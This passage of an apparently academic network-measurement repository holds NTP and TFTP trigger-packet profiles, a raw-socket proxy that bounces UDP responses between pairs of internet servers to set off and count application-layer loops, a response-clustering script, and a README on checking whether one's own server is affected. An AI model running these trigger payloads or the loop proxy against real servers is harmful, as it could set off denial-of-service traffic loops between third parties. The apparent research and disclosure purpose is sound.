self.attack_name_to_pkt["cntrl_clock_stat1"] = to_hex(NTPControl(err=1, response=1, status_word=NTPClockStatusPacket(clock_status=149, code=5))) 242 | self.attack_name_to_format["cntrl_clock_stat1"] = HEX 243 | 244 | self.attack_name_to_pkt["cntrl_clock_stat2"] = to_hex(NTPControl(err=1, response=1, status_word=NTPClockStatusPacket(clock_status=5))) 245 | self.attack_name_to_format["cntrl_clock_stat2"] = HEX 246 | 247 | self.attack_name_to_pkt["cntrl_peer_stat1"] = to_hex(NTPControl(err=1, response=1, status_word=NTPPeerStatusPacket(peer_sel=0, peer_event_code=2))) 248 | self.attack_name_to_format["cntrl_peer_stat1"] = HEX 249 | 250 | 251 | 252 | # -------------------- Private reserved ----------------------------------- 253 | 254 | self.attack_name_to_pkt["bad5_rsvd"] = "270206000000007f00000100000000e8622e8655e0000000000000000000e8622e86696000" 255 | self.attack_name_to_format["bad5_rsvd"] = HEX 256 | 257 | self.attack_name_to_pkt["bad2_rsvd"] = "27020a0000000000000000007f000001000000000000007c5f8504ad93cd4cd1aad3329ffbb2fea822a2f2fead61ea73" 258 | self.attack_name_to_format["bad2_rsvd"] = HEX 259 | 260 | self.attack_name_to_pkt["bad6_rsvd"] = "270f1a0e0310a0da40130c007f000bb10a00000000000ca0e86a2ee6bf6ce0000a300001b00c000e0e8622e86556a600b0" 261 | self.attack_name_to_format["bad6_rsvd"] = HEX 262 | 263 | self.attack_name_to_pkt["bad4_rsvd"] = 
"27102034a0130034000340aa0340500105065307090807f263000001b000000b0bb000b000000e8622e8b6556b7e0000b0000000b000000b00e862b2e86b55696000" 264 | self.attack_name_to_format["bad4_rsvd"] = HEX 265 | 266 | class TFTP_Attack_Profile: 267 | def __init__(self): 268 | self.port = 69 # Port corresponding to the protocol. 269 | self.attack_name_to_pkt = {} # Stores the attack packets that can be 270 | # sent to create a loop attack by 271 | # abusing dns protocol implementations. 272 | self.attack_name_to_format = {} # Maps each attack in 273 | # 'attack_name_to_pkt' to the packet's 274 | # format (format options in 275 | # class Attack_Pkt_Format()). 276 | 277 | # ------------------- Good Request -------------------------------- 278 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/TFTP_RRQ() 279 | self.attack_name_to_pkt['good_read_req'] = to_hex(tftp_payload) 280 | self.attack_name_to_format['good_read_req'] = HEX 281 | 282 | # ------------------- REQEUST BAD MODE ---------------------------- 283 | request_mode = TFTP_RRQ() 284 | request_mode.mode = b'ajsoei' 285 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/request_mode 286 | self.attack_name_to_pkt['bad_mode_read_req'] = to_hex(tftp_payload) 287 | self.attack_name_to_format['bad_mode_read_req'] = HEX 288 | 289 | # ------------------- REQUEST BAD NULL BYTES ---------------------- 290 | 291 | tftp_payload = TFTP(op=1)/b'.'/TFTP_RRQ() 292 | self.attack_name_to_pkt['read_req_dir'] = to_hex(tftp_payload) 293 | self.attack_name_to_format['read_req_dir'] = HEX 294 | 295 | tftp_payload = TFTP(op=1)/TFTP_RRQ() 296 | self.attack_name_to_pkt['read_req_no_filename'] = to_hex(tftp_payload) 297 | self.attack_name_to_format['read_req_no_filename'] = HEX 298 | 299 | 300 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/b'\x00'/b'\x00' 301 | self.attack_name_to_pkt['read_req_no_mode'] = to_hex(tftp_payload) 302 | self.attack_name_to_format['read_req_no_mode'] = HEX 303 | 304 | tftp_payload = TFTP(op=1)/b'\x00'/b'\x00' 305 | self.attack_name_to_pkt['read_req_no_file_mode'] = to_hex(tftp_payload) 306 | self.attack_name_to_format['read_req_no_file_mode'] = HEX 307 | 308 | 309 | tftp_payload = TFTP(op=1)/b'fJFJmcl.jieopg'/b'\x00octet' 310 | self.attack_name_to_pkt['read_req_no_end'] = to_hex(tftp_payload) 311 | self.attack_name_to_format['read_req_no_end'] = HEX 312 | 313 | tftp_payload = TFTP(op=1)/b'fJFJm@!cl.jieopg'/b'\x00octet\x00' 314 | self.attack_name_to_pkt['read_req_bad_symbol_fname'] = to_hex(tftp_payload) 315 | self.attack_name_to_format['read_req_bad_symbol_fname'] = HEX 316 | 317 | tftp_payload = TFTP(op=1) 318 | self.attack_name_to_pkt['read_req_no_payload'] = to_hex(tftp_payload) 319 | self.attack_name_to_format['read_req_no_payload'] = HEX 320 | 321 | # ------------------- UNEXPECTED DATA ----------------------------- 322 | 323 | 324 | tftp_payload = TFTP(op=3)/b'\x00\x17\x61\x61' 325 | self.attack_name_to_pkt['data_2_bytes'] = to_hex(tftp_payload) 326 | self.attack_name_to_format['data_2_bytes'] = HEX 327 | 328 | tftp_payload = TFTP(op=3)/b'\x00\x17'/b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' 
329 | self.attack_name_to_pkt['data_512_bytes'] = to_hex(tftp_payload) 330 | self.attack_name_to_format['data_512_bytes'] = HEX 331 | 332 | # ------------------ UNEXPECTED ACK ------------------------------- 333 | tftp_payload = TFTP(op=4)/b'\x00\x17' 334 | self.attack_name_to_pkt['ack'] = to_hex(tftp_payload) 335 | self.attack_name_to_format['ack'] = HEX 336 | 337 | tftp_payload = TFTP(op=4) 338 | self.attack_name_to_pkt['ack_no_payload'] = to_hex(tftp_payload) 339 | self.attack_name_to_format['ack_no_payload'] = HEX 340 | 341 | # ------------------ ERROR_MESSAGE -------------------------------- 342 | 343 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=0,errormsg='Not defined') 344 | self.attack_name_to_pkt['err0'] = to_hex(tftp_payload) 345 | self.attack_name_to_format['err0'] = HEX 346 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=1,errormsg='File not found') 347 | self.attack_name_to_pkt['err1'] = to_hex(tftp_payload) 348 | self.attack_name_to_format['err1'] = HEX 349 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=2,errormsg='Access violation') 350 | self.attack_name_to_pkt['err2'] = to_hex(tftp_payload) 351 | self.attack_name_to_format['err2'] = HEX 352 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=3,errormsg='Disk full or allocation exceeded') 353 | self.attack_name_to_pkt['err3'] = to_hex(tftp_payload) 354 | self.attack_name_to_format['err3'] = HEX 355 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=4,errormsg='Illegal TFTP operation') 356 | self.attack_name_to_pkt['err4'] = to_hex(tftp_payload) 357 | self.attack_name_to_format['err4'] = HEX 358 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=5,errormsg='Unknown transfer ID') 359 | self.attack_name_to_pkt['err5'] = to_hex(tftp_payload) 360 | self.attack_name_to_format['err5'] = HEX 361 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=6,errormsg='File already exists') 362 | self.attack_name_to_pkt['err6'] = to_hex(tftp_payload) 363 | self.attack_name_to_format['err6'] = HEX 364 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=7,errormsg='No such user') 365 | self.attack_name_to_pkt['err7'] = to_hex(tftp_payload) 366 | self.attack_name_to_format['err7'] = HEX 367 | tftp_payload = TFTP(op=5)/TFTP_ERROR(errorcode=128,errormsg='Test ERROR') 368 | self.attack_name_to_pkt['err8'] = to_hex(tftp_payload) 369 | self.attack_name_to_format['err8'] = HEX 370 | 371 | proto_to_profile = { 372 | "dns" : DNS_Attack_Profile(), 373 | "ntp" : NTP_Attack_Profile(), 374 | "tftp" : TFTP_Attack_Profile(), 375 | "chargen" : Chargen_Attack_Profile(), 376 | "qotd" : Qotd_Attack_Profile(), 377 | "echo" : Echo_Attack_Profile(), 378 | "daytime" : Daytime_Attack_Profile(), 379 | 'auser': Auser_Attack_Profile(), 380 | 'time' : Time_Attack_Profile(), 381 | } 382 | 383 | 384 | ''' 385 | If you want to add a new discovery probe to an existing protocol, e.g., TFTP, you can add the following 386 | lines to class *TFTP_Attack_Profile*. 387 | 388 | self.attack_name_to_pkt[''] = 'a hex string, e.g., 0x0005000500' 389 | self.attack_name_to_format[''] = HEX 390 | 391 | or you can add: 392 | 393 | self.attack_name_to_pkt[''] = 'a string' 394 | self.attack_name_to_format[''] = TEXT 395 | 396 | TEXT and HEX are two probe payload types accepted by Zmap. 397 | 398 | ---------------------------------------------------------------------------------------- 399 | 400 | If you want to probe a new protocol, you can add the following: 401 | 402 | 1. create a new class for the new protocol and add discovery probes. 
Example: 403 | 404 | class New_Protocol_Attack_Profile: 405 | def __init__(self): 406 | self.port = XX # Port corresponding to the protocol. 407 | self.attack_name_to_pkt = {} 408 | self.attack_name_to_format = {} 409 | 410 | self.attack_name_to_pkt['probe_1'] = 'example_payload_string' 411 | self.attack_name_to_format['probe_1'] = TEXT 412 | 413 | 2. create an instance for the new class in ```proto_to_profile```. Example: 414 | 415 | 416 | proto_to_profile = { 417 | "dns" : DNS_Attack_Profile(), 418 | "ntp" : NTP_Attack_Profile(), 419 | "tftp" : TFTP_Attack_Profile(), 420 | "chargen" : Chargen_Attack_Profile(), 421 | "qotd" : Qotd_Attack_Profile(), 422 | "echo" : Echo_Attack_Profile(), 423 | "daytime" : Daytime_Attack_Profile(), 424 | 'auser': Auser_Attack_Profile(), 425 | 'time' : Time_Attack_Profile(), 426 | 'new_p' : New_Protocol_Attack_Profile(), 427 | } 428 | 429 | ''' -------------------------------------------------------------------------------- /proxy.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from threading import Thread 3 | import sys 4 | import queue 5 | import time 6 | import pickle 7 | from scapy.all import * 8 | import psycopg2 9 | import random 10 | import os 11 | 12 | if len(sys.argv)!=7: 13 | print('python3 proxy.py ') 14 | exit(0) 15 | 16 | local_ip = sys.argv[1] 17 | scan_2nd_table_name = sys.argv[2] 18 | scan_payload_file = sys.argv[3] 19 | cycle_ip_dict_file = sys.argv[4] 20 | start_port = int(sys.argv[5]) 21 | proto_port = int(sys.argv[6]) 22 | 23 | 24 | 25 | 26 | TRUE_POSITIVE_CAP = 25 27 | RATE_LIMIT = 3 28 | SAMPLED_PAIRS_PER_CYCLE = 100 29 | OVER_ALL_TIMEOUT = 300 30 | 31 | 32 | class Host(): 33 | def __init__(self,host_ip,host_port,ratelimit=3): 34 | self.host_ip = host_ip 35 | self.host_port = host_port 36 | self.ratelimit = ratelimit 37 | self.last_sent_time = int(time.time()*10) 38 | self.interval = int((1.0/(ratelimit * 1.0))*10) 39 | def get_addr(self): 40 | return (self.host_ip,self.host_port) 41 | 42 | def get_and_update_next_pac_time(self): 43 | curr_time = int(time.time()*10) 44 | self.last_sent_time = max(curr_time,self.last_sent_time+self.interval) 45 | return self.last_sent_time 46 | 47 | 48 | class Loop_pair(): 49 | def __init__(self, local_ip, local_port, host_A, host_B): 50 | self.host_A = host_A 51 | self.host_B = host_B 52 | 53 | self.host_A_ip,self.host_A_port = host_A.get_addr() 54 | self.host_B_ip,self.host_B_port = host_B.get_addr() 55 | 56 | self.local_ip = local_ip 57 | self.local_port = local_port 58 | 59 | self.prepared_to_A_pac = IP(src=local_ip,dst=self.host_A_ip)/UDP(sport=local_port,dport=self.host_A_port) 60 | self.prepared_to_B_pac = IP(src=local_ip,dst=self.host_B_ip)/UDP(sport=local_port,dport=self.host_B_port) 61 | 62 | self.total_rcv_counter = 0 63 | 64 | def get_peer_pac(self,ip_addr): 65 | if self.host_A_ip==ip_addr: 66 | return (self.prepared_to_B_pac,self.host_B) 67 | elif self.host_B_ip==ip_addr: 68 | return (self.prepared_to_A_pac,self.host_A) 69 | else: 70 | raise Exception() 71 | 72 | def get_host_A_addr(self): 73 | return (self.host_A_ip, self.host_A_port) 74 | 75 | def get_host_B_addr(self): 76 | return (self.host_B_ip, self.host_B_port) 77 | 78 | 79 | 80 | class Proxy_core(): 81 | def __init__(self,local_ip,cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,timeout,protocol_port,start_port_number): 82 | self.timeout = timeout 83 | self.protocol_port = protocol_port 84 | self.raw_sock = 
socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_UDP) 85 | self.raw_sock.setsockopt(0,socket.IP_HDRINCL,1) 86 | self.raw_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 52428800) 87 | self.local_ip = local_ip 88 | self.raw_sock.bind((local_ip,0)) 89 | self.port_pair_mapping = {} 90 | self.cycle_pair_mapping = {} 91 | self.ip_hostobj_mapping = {} 92 | self.send_queue = queue.PriorityQueue() 93 | self.input_queue = queue.Queue() 94 | 95 | self.work_scheduler(cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,start_port_number) 96 | 97 | # ----- threading init ----- 98 | thread1 = Thread(target=self.worker_recv) 99 | thread2 = Thread(target=self.worker_send) 100 | thread4 = Thread(target=self.worker_pac_build) 101 | 102 | thread1.start() 103 | thread2.start() 104 | thread4.start() 105 | # listening started 106 | # next step is to send initial probes so we can cause a loop 107 | for cycle in self.cycle_pair_mapping.keys(): 108 | pair_list,init_payload = self.cycle_pair_mapping[cycle] 109 | for loop_pair in pair_list: 110 | packet = IP(raw(loop_pair.prepared_to_A_pac/init_payload)) 111 | self.raw_sock.sendto(bytes(packet),loop_pair.get_host_A_addr()) 112 | time.sleep(0.05) 113 | 114 | 115 | thread3 = Thread(target=self.progress_check) 116 | thread3.start() 117 | 118 | def work_scheduler(self,cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,start_port_number): 119 | f = open(scan_payload_file,'rb') 120 | payload_dict = pickle.load(f) 121 | f.close() 122 | 123 | self.most_replied_probe_each_cluster = {} 124 | db_name = "loop_scan" 125 | db_conn = psycopg2.connect(database=db_name, user="scan") 126 | db_conn.autocommit = True 127 | cursor = db_conn.cursor() 128 | # select_command = "SELECT ARRAY_LENGTH(ARRAY_agg(DISTINCT rsp_src_ip),1) as c,attack_name,index FROM %s GROUP BY index,attack_name ORDER BY c DESC;" % scan_2nd_table_name 129 | select_command = "SELECT ARRAY_LENGTH(ARRAY_agg(DISTINCT rsp_src_ip),1),attack_name,index FROM %s GROUP BY index,attack_name ORDER BY attack_name,index DESC;" % scan_2nd_table_name 130 | cursor.execute(select_command) 131 | all_data = cursor.fetchall() 132 | for entry in all_data: 133 | if not entry[1] in self.most_replied_probe_each_cluster: 134 | self.most_replied_probe_each_cluster[entry[1]] = int(entry[2]) 135 | 136 | f = open(cycle_ip_dict_file,'rb') 137 | cycle_ip_dict = pickle.load(f) 138 | f.close() 139 | 140 | # per_cycle_init = {} 141 | # cluster_table = '' 142 | # for cycle in cycle_ip_dict.keys(): 143 | # init_payload_type = cycle[1:-1].split(', ')[0] 144 | # second_payload_type = cycle[1:-1].split(', ')[1] 145 | # select_command = "select ARRAY_LENGTH(ARRAY_agg(DISTINCT rsp_src_ip),1) as c, attack_name, index FROM (select * from %s JOIN %s on rsp_payload=payload WHERE attack_name='%s' and type_id=%s) as t GROUP BY index,attack_name ORDER BY c DESC;" % (scan_2nd_table_name,cluster_table,init_payload_type,second_payload_type) 146 | # cursor.execute(select_command) 147 | # all_data = cursor.fetchall() 148 | # for entry in all_data: 149 | # if not cycle in per_cycle_init: 150 | # per_cycle_init[cycle] = entry[2] 151 | 152 | 153 | 154 | for cycle in cycle_ip_dict.keys(): 155 | self.cycle_pair_mapping[cycle] = [[],''] 156 | host_A_ips = (random.sample(cycle_ip_dict[cycle][0],SAMPLED_PAIRS_PER_CYCLE)) 157 | host_B_ips = (random.sample(cycle_ip_dict[cycle][1],SAMPLED_PAIRS_PER_CYCLE)) 158 | if len(host_A_ips)<100 or len(host_B_ips)<100: 159 | print('cycle ', cycle ,'does not have enough ips for sampling') 160 | 161 | 
initiate_probe_type = cycle[1:-1].split(',')[0] 162 | payload_to_initiate = payload_dict[initiate_probe_type][self.most_replied_probe_each_cluster[initiate_probe_type]] 163 | # payload_to_initiate = payload_dict[initiate_probe_type][int(per_cycle_init[cycle])] 164 | 165 | self.cycle_pair_mapping[cycle][1] = bytes.fromhex(payload_to_initiate) 166 | 167 | for i in range(0,SAMPLED_PAIRS_PER_CYCLE): 168 | if not host_A_ips[i] in self.ip_hostobj_mapping: 169 | self.ip_hostobj_mapping[host_A_ips[i]] = Host(host_A_ips[i],self.protocol_port,ratelimit=RATE_LIMIT) 170 | if not host_B_ips[i] in self.ip_hostobj_mapping: 171 | self.ip_hostobj_mapping[host_B_ips[i]] = Host(host_B_ips[i],self.protocol_port,ratelimit=RATE_LIMIT) 172 | loop_pair_object = Loop_pair(self.local_ip,start_port_number,self.ip_hostobj_mapping[host_A_ips[i]],self.ip_hostobj_mapping[host_B_ips[i]]) 173 | 174 | self.port_pair_mapping[start_port_number] = loop_pair_object 175 | self.cycle_pair_mapping[cycle][0].append(loop_pair_object) 176 | start_port_number = start_port_number + 1 177 | if start_port_number > 65535: 178 | raise Exception('out of ports') 179 | 180 | 181 | def worker_pac_build(self): 182 | while(True): 183 | try: 184 | self.build_queued_pac(self.input_queue.get()) 185 | except: 186 | pass 187 | 188 | def build_queued_pac(self,packet): 189 | try: 190 | proto = int.from_bytes(packet[9:10]) 191 | if proto!=17: 192 | return 193 | src_port = int.from_bytes(packet[20:22]) 194 | dst_port = int.from_bytes(packet[22:24]) 195 | 196 | if src_port!=self.protocol_port: 197 | return 198 | loop_pair = self.port_pair_mapping[dst_port] 199 | except: 200 | return 201 | 202 | 203 | try: 204 | packet_to_sent,target_host = loop_pair.get_peer_pac(socket.inet_ntoa(packet[12:16])) 205 | except: 206 | return 207 | 208 | if loop_pair.total_rcv_counter >= TRUE_POSITIVE_CAP: 209 | return 210 | loop_pair.total_rcv_counter = loop_pair.total_rcv_counter + 1 211 | 212 | 213 | addr_tuple = target_host.get_addr() 214 | pac = IP(raw(packet_to_sent/packet[28:])) 215 | send_time = target_host.get_and_update_next_pac_time() 216 | self.send_queue.put((send_time,(pac,addr_tuple))) 217 | 218 | def worker_recv(self): 219 | while(True): 220 | packet = self.raw_sock.recv(8096) 221 | self.input_queue.put(packet) 222 | 223 | def worker_send(self): 224 | while(True): 225 | try: 226 | send_time = self.send_queue.queue[0][0] 227 | except: 228 | pass 229 | else: 230 | curr_time = int(time.time()*10) 231 | if send_time<=curr_time: 232 | pac,addr_tuple = self.send_queue.get()[1] 233 | try: 234 | self.raw_sock.sendto(bytes(pac),addr_tuple) 235 | except Exception as e: 236 | print(str(e), ' : ', bytes(pac), ' : ', addr_tuple) 237 | 238 | def progress_check(self): 239 | start_time = time.time() 240 | while(True): 241 | time.sleep(30) 242 | curr_time = time.time() 243 | if curr_time-start_time > self.timeout: 244 | f = open('udp_proxy_result.log','w') 245 | for key in self.cycle_pair_mapping.keys(): 246 | f.write(str(key).strip() + '\n') 247 | for pair in self.cycle_pair_mapping[key][0]: 248 | line = str(pair.get_host_A_addr()) + ' : ' + str(pair.get_host_B_addr()) + ':' + str(pair.total_rcv_counter) + '\n' 249 | f.write(line) 250 | pair.total_rcv_counter = TRUE_POSITIVE_CAP + 1 251 | f.close() 252 | print('-----End-----') 253 | os._exit(0) 254 | else: 255 | lines = [] 256 | for key in self.cycle_pair_mapping.keys(): 257 | temp_counter = 0 258 | for pair in self.cycle_pair_mapping[key][0]: 259 | if pair.total_rcv_counter >= TRUE_POSITIVE_CAP: 260 | temp_counter = 
temp_counter + 1 261 | line = str(key).strip() + ' : ' + str(temp_counter) + '/' + str(len(self.cycle_pair_mapping[key][0])) + '\n' 262 | lines.append(line) 263 | 264 | 265 | f = open('progress.log','w') 266 | for line in lines: 267 | f.write(line) 268 | f.write(str(time.time())) 269 | f.close() 270 | 271 | 272 | 273 | proxy = Proxy_core(local_ip,cycle_ip_dict_file,scan_payload_file,scan_2nd_table_name,OVER_ALL_TIMEOUT,proto_port,start_port) 274 | -------------------------------------------------------------------------------- /sample_loop_probe_payloads.py: -------------------------------------------------------------------------------- 1 | import psycopg2 2 | import pickle 3 | import random 4 | import sys 5 | 6 | db_name = "loop_scan" 7 | db_conn = psycopg2.connect(database=db_name, user="scan") 8 | db_conn.autocommit = True 9 | cursor = db_conn.cursor() 10 | 11 | if len(sys.argv)!=5: 12 | print('python3 sample_loop_probe_payloads.py ') 13 | exit(-1) 14 | 15 | proto = sys.argv[1].lower() 16 | discovery_table = sys.argv[2] 17 | cluster_table = sys.argv[3] 18 | responder_amount = int(sys.argv[4]) 19 | 20 | 21 | 22 | select_command = "SELECT type_id,IPs FROM (SELECT type_id, (ARRAY_AGG(DISTINCT rsp_payload)) AS IPs, COUNT(DISTINCT rs\ 23 | p_src_ip) AS IP_count FROM (SELECT * FROM %s JOIN %s on rsp\ 24 | _payload=payload) AS temp GROUP BY type_id ORDER BY IP_count DESC) AS temp2 WHERE IP_count>%d;" % (discovery_table, cluster_table,responder_amount) 25 | 26 | cursor.execute(select_command) 27 | all_data = cursor.fetchall() 28 | 29 | 30 | output_dict = {} 31 | 32 | 33 | f_name = '%s_payload.pkl' % proto 34 | f=open(f_name,'wb') 35 | for item in all_data: 36 | all_payload_in_cluster = list(item[1]) 37 | if len(all_payload_in_cluster)<=5: 38 | output_dict[str(item[0])] = list(item[1]) 39 | else: 40 | output_dict[str(item[0])] = random.sample(all_payload_in_cluster,5) 41 | 42 | 43 | pickle.dump(output_dict,f) 44 | f.close() 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /tftp_clustering.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import psycopg2 3 | import pickle 4 | import psycopg2.extras 5 | import pathvalidate 6 | 7 | 8 | def TFTP_classifier(payload): 9 | status_code = '' 10 | status_bit = '' 11 | 12 | payload_hex_len = len(payload) 13 | 14 | if payload_hex_len<4: 15 | status_code = 'os' 16 | return status_code 17 | 18 | if payload_hex_len%2 !=0: 19 | status_code = 'hf' 20 | 21 | opcode = payload[0:4] 22 | payload = payload[4:] 23 | 24 | if opcode == '0001' or opcode=='0002': 25 | if opcode =='0001': 26 | status_bit = 'rr' 27 | else: 28 | status_bit = 'wr' 29 | 30 | first_null_byte = payload.index('00') 31 | if first_null_byte == -1: 32 | status_bit = status_bit + 'nf' +'nm' + 'nn' 33 | status_code = status_code + status_bit 34 | return status_code 35 | 36 | filename = payload[4:first_null_byte] 37 | try: 38 | filename = bytes.fromhex(filename).decode() 39 | filename_len = len(filename) 40 | if len(filename)<32: 41 | status_bit = status_bit + '32' 42 | elif len(filename)<256: 43 | status_bit = status_bit + '256' 44 | else: 45 | status_bit = status_bit + 'ffff' 46 | 47 | if pathvalidate.is_valid_filename(filename,platform='Linux'): 48 | status_bit = status_bit + 'vflin' 49 | else: 50 | status_bit = status_bit + 'iflin' 51 | 52 | if pathvalidate.is_valid_filename(filename,platform='Windows'): 53 | status_bit = status_bit + 'vfwin' 54 | else: 55 | status_bit = 
status_bit + 'ifwin' 56 | 57 | if pathvalidate.is_valid_filename(filename,platform='macOS'): 58 | status_bit = status_bit + 'vfmac' 59 | else: 60 | status_bit = status_bit + 'ifmac' 61 | 62 | if pathvalidate.is_valid_filename(filename,platform='POSIX'): 63 | status_bit = status_bit + 'vfpos' 64 | else: 65 | status_bit = status_bit + 'ifpos' 66 | except: 67 | status_bit = status_bit + 'bf' 68 | 69 | # ----- mode -------- 70 | 71 | payload = payload[first_null_byte+2:] 72 | second_null_byte = payload.index('00') 73 | if second_null_byte == -1: 74 | status_bit = status_bit +'nm'+'n2n' 75 | status_code = status_code + status_bit 76 | return status_code 77 | 78 | mode = payload[0:second_null_byte] 79 | mode = bytes.fromhex(mode).decode() 80 | status_bit = status_bit + mode 81 | 82 | # ----- rest -------- 83 | 84 | payload = payload[second_null_byte+2:] 85 | if len(payload)>0: 86 | status_bit = status_bit + 'extra' 87 | 88 | 89 | status_code = status_code + status_bit 90 | return status_code 91 | 92 | elif opcode == '0003': 93 | status_bit ='dr' 94 | if len(payload)<4: 95 | status_bit = status_bit + 'os' 96 | status_code = status_code + status_bit 97 | return status_code 98 | 99 | block_id = int(payload[0:4],16) 100 | if block_id ==0: 101 | status_bit = status_bit + '0b' 102 | 103 | payload = payload[4:] 104 | if len(payload)<1024: 105 | status_bit = status_bit+'eb' 106 | elif len(payload)==1024: 107 | status_bit = status_bit + 'fb' 108 | elif len(payload)>1024: 109 | status_bit = status_bit + 'ob' 110 | 111 | status_code = status_code + status_bit 112 | return status_code 113 | 114 | elif opcode == '0004': 115 | status_bit = 'ar' 116 | if len(payload)<4: 117 | status_bit = status_bit + 'os' 118 | if len(payload)>4: 119 | status_bit = status_bit + 'extra' 120 | status_code = status_code + status_bit 121 | return status_code 122 | 123 | elif opcode == '0005': 124 | status_bit = 'er' 125 | if len(payload)<4: 126 | status_bit = status_bit + 'os' 127 | status_code = status_code + status_bit 128 | return status_code 129 | 130 | error_code = payload[0:4] 131 | status_bit = status_bit + error_code 132 | payload = payload[4:] 133 | 134 | num_of_null_byte = payload.count('00') 135 | status_bit = status_bit + str(num_of_null_byte) 136 | status_code = status_code + status_bit 137 | return status_code 138 | 139 | else: 140 | status_bit = opcode 141 | if len(payload)<64: 142 | status_bit =status_bit + '64' 143 | elif len(payload) < 256: 144 | status_bit = status_bit + '256' 145 | elif len(payload) <1024: 146 | status_bit = status_bit + '1024' 147 | else: 148 | status_bit = status_bit + 'ffff' 149 | status_code = status_code + status_bit 150 | return status_code 151 | 152 | 153 | 154 | def do_cluster(raw_data_table_name,output_mapping_table_name,cluster_payload_pattern_mapping): 155 | db_name = "loop_scan" 156 | db_conn = psycopg2.connect(database=db_name, user="scan") 157 | db_conn.autocommit = True 158 | cursor = db_conn.cursor() 159 | 160 | sql_get_length = "SELECT COUNT(*) FROM %s;" % (raw_data_table_name) 161 | cursor.execute(sql_get_length) 162 | max_item_count = cursor.fetchall()[0][0] 163 | 164 | 165 | status_dict = {} 166 | total_cluster = 0 167 | try: 168 | dict_file = open(cluster_payload_pattern_mapping,'rb') 169 | status_dict = pickle.load(dict_file) 170 | total_clusters = len(status_dict) 171 | dict_file.close() 172 | except: 173 | pass 174 | 175 | 176 | offset = 0 177 | step_size = 10000 178 | progress_count = 0 179 | 180 | try: 181 | drop_table = "DROP TABLE %s;" % (output_mapping_table_name) 
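        # Note: the output mapping table is dropped and re-created on every run;
        # cluster ids persist only through the pickled pattern-to-id mapping
        # (cluster_payload_pattern_mapping) loaded above, so reusing the same
        # mapping file keeps cluster ids stable across runs.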
182 | cursor.execute(drop_table) 183 | except: 184 | pass 185 | 186 | create_table = "CREATE TABLE %s (type_id INT,\ 187 | payload TEXT PRIMARY KEY);" % (output_mapping_table_name) 188 | cursor.execute(create_table) 189 | 190 | 191 | insert_command = "INSERT INTO " + output_mapping_table_name + " VALUES %s;" 192 | payload_list = set() 193 | while(True): 194 | if offset > max_item_count: 195 | break 196 | 197 | select_command = "select DISTINCT rsp_payload from %s;" % (raw_data_table_name) 198 | cursor.execute(select_command) 199 | all_data = cursor.fetchall() 200 | 201 | update_list = [] 202 | for data in all_data: 203 | progress_count = progress_count + 1 204 | payload_data = data[0].strip() 205 | total_clusters = len(status_dict.keys()) + 1 206 | status_code = TFTP_classifier(payload_data) 207 | if len(payload_data) > 2500: 208 | continue 209 | if not status_code in status_dict: 210 | status_dict[status_code] = total_clusters 211 | 212 | if not payload_data in payload_list: 213 | update_list.append((status_dict[status_code],payload_data,)) 214 | payload_list.add(payload_data) 215 | 216 | temp = psycopg2.extras.execute_values(cursor,insert_command,update_list) 217 | 218 | 219 | offset = offset + step_size 220 | break 221 | 222 | 223 | with open(cluster_payload_pattern_mapping,'wb') as f: 224 | pickle.dump(status_dict,f) 225 | f.close() 226 | 227 | 228 | import sys 229 | 230 | if len(sys.argv)!=4: 231 | print('python3 tftp_clustering.py <scan_table_name> <cluster_table_name> <type_summary_id_mapping_dict>') 232 | exit(-1) 233 | 234 | scan_table_name = sys.argv[1] 235 | cluster_table_name = sys.argv[2] 236 | type_summary_id_mapping_dict = sys.argv[3] 237 | do_cluster(scan_table_name,cluster_table_name,type_summary_id_mapping_dict) 238 | 239 | -------------------------------------------------------------------------------- /verify/README.md: -------------------------------------------------------------------------------- 1 | If you want to check whether your server/software is affected, you can use the provided ```simple_verify.py``` script. 2 | 3 | python3 simple_verify.py <protocol> <server_ip> 4 | 5 | <protocol>: dns, ntp, tftp 6 | <server_ip>: IP of the tested server 7 | 8 | 9 | The script will send a series of trigger probes identified in our experiment. Since all of these trigger probes are responses/error messages that a server should not react to, observing a response from your server likely indicates that it is affected. 10 | 11 | Note that some TFTP implementations send responses from a random source port rather than port 69. If your server does not send its TFTP response from source port 69, it is likely not affected.
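
If you want to capture any such response automatically, a small Scapy sniffer can be run in a second terminal while ```simple_verify.py``` sends its triggers. The sketch below is only illustrative and is not part of this repository; the server IP, the port, and the 30-second capture window are placeholder values:

    # hypothetical helper, run with root privileges alongside simple_verify.py
    from scapy.all import sniff

    server_ip = "192.0.2.10"    # IP of the tested server (example value)
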